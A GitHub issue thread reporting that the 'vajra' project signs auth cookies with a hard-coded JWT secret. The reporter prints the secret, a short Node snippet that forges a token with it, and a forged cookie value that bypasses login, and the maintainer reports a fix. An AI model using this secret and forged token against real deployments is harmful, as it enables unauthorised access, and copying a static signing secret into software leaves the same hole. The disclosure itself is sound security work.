### ISSUE TITLE
Vulnerability: Authentication Bypass?

### ISSUE THREAD

**Issue by payloadartist** [r3curs1v3-pr0xy/vajra#21]
Hi,

I was trying out Vajra.

In [index.js](https://github.com/r3curs1v3-pr0xy/vajra/blob/main/index.js), seems like you are using a **static jwt secret** to generate the auth cookie, which isn't rotated: https://github.com/r3curs1v3-pr0xy/vajra/blob/87ca56b1666704e448e67a2c135d2f1f2f40b216/index.js#L60

JWT secret:

```
   fIskNyRbdGmdaekbMSRlAkU5RIJc6V7I
```

Hence, anyone can generate a valid jwt and bypass authentication as the jwt secret is known (and also, not changed per installation) using the following snippet:

```
const jwt = require('jsonwebtoken')
console.log(jwt.sign({user: 'test'}, 'fIskNyRbdGmdaekbMSRlAkU5RIJc6V7I'));
```

For example, I generated a random jwt token with user `test` using the snippet above, and I could bypass authentication by putting that in the ```auth``` cookie:

```auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsImlhdCI6MTYxNjkxMzczNX0.fojvWFTppXN2KfHhVh9el0mSkyPNll-En8RkWHXdRG8```

And I was able to bypass auth.

I feel you should implement a stronger authentication as often people don't deploy them locally and need to expose it to the internet, so a stronger authentication is a must :) 

Cheers

**Comment by r3curs1v3-pr0xy** [comment]
Thanks for pointing out this issue @payloadartist

**Comment by r3curs1v3-pr0xy** [comment]
This issue has been fixed: 5584c5409e3c85201c7cd69d703681c02274cd26
